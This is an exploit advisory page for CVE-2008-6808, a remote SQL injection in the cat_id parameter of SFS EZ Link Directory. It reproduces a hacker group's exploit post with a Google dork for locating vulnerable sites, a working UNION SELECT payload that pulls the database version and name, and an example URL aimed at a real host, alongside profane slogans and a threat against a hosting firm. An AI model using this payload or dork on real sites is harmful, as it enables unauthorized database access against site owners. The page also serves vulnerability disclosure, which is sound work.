SFS EZ Link Directory (cat_id) Remote SQL Injection Vulnerability

2009.05.15
Credit: BeyazKurt
Risk: Medium
Local: No
Remote: Yes
CVE: CVE-2008-6808
CWE: CWE-89


CVSS Base Score: 7.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

####################################################### # Author : BeyazKurt # Contact : BeyazKurt@BSDMail.Com # Site : www.khg-crew.ws - KOSOVA HACKERS GROUP # LAHEY mahkemesini kiniyoruz. FUCK THE JUSTICE! # Hack = Empty W0rk .. # # Script : SFS Link Directory # Price: $ 24.95 # Script Site: http://scripts-for-sites.com/item.php?item=117 # # D0rk : "sie go. amk i�inizmi yok xD" # sakalan xD bisuru site var : inurl:"links.php?ax=list" # # SQL Injection Vuln. : # # Exploit : SITE.COM/[path]/links.php?ax=list&sub=1&cat_id=1+union+select+0,1,version(),database()/* # # Example: http://link.scripts-for-sites.com/links.php?ax=list&sub=1&cat_id=1+union+select+0,1,version(),database()/* # # ------------------------------- # Ya RAMADHAN # INDEPENDENT KOSOVA (H) - Etnic ALBANIA (H) # pigs for dedication : WE Are Don't Forget Kosova, Drenica, Srebrenica And All Genocide !! # Proud 2 Be ALBANIAN ! # # bütün emocu,punkci zartci zurtcularin Aq! Anti-Tikky.Com anti-tikiyiz xD # # ONEMLI Not Expo Bilisimden host almayin. Serefsizler daha sunucu yonetmeyi bilmiyor bide ustune musteriyi keklemeye calisiyo. Yakinda kanitlariyla r10da yayinlicam ;) # Demistim rezil edicem sizi ;) # #######################################################

References:

http://www.securityfocus.com/bid/32034
http://www.milw0rm.com/exploits/6908


See this note in RAW Version
Vote for this issue:
50%
50%

Comment it here.
Copyright 2025, cxsecurity.com

 

Back to Top